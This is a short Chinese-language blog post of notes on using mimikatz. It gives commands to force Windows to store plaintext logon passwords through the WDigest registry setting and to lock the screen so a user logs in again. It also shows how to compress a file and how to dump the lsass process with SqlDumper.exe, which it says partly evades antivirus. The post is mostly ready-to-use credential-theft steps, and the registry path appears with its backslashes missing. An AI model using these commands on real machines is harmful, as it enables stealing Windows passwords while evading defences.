mimikatz注意事项

修改注册表让Wdigest Auth保存明文口令

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

lockscreen.ps1

Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation

执行: powershell -file lockscreen.ps1

锁屏CMD

rundll32.exe user32.dll,LockWorkStation

压缩文件

makecab /d compressiontype=lzx c:\1.txt c:\1.rar

SqlDumper with mimikatz

SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和prodump相似,具备一定免杀能力。SqlDumper.exe默认存放在c:\Program Files\Microsoft SQL Server\number\shared。

tasklist /svc |findstr lsass.exe
sqldumper.exe processID 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值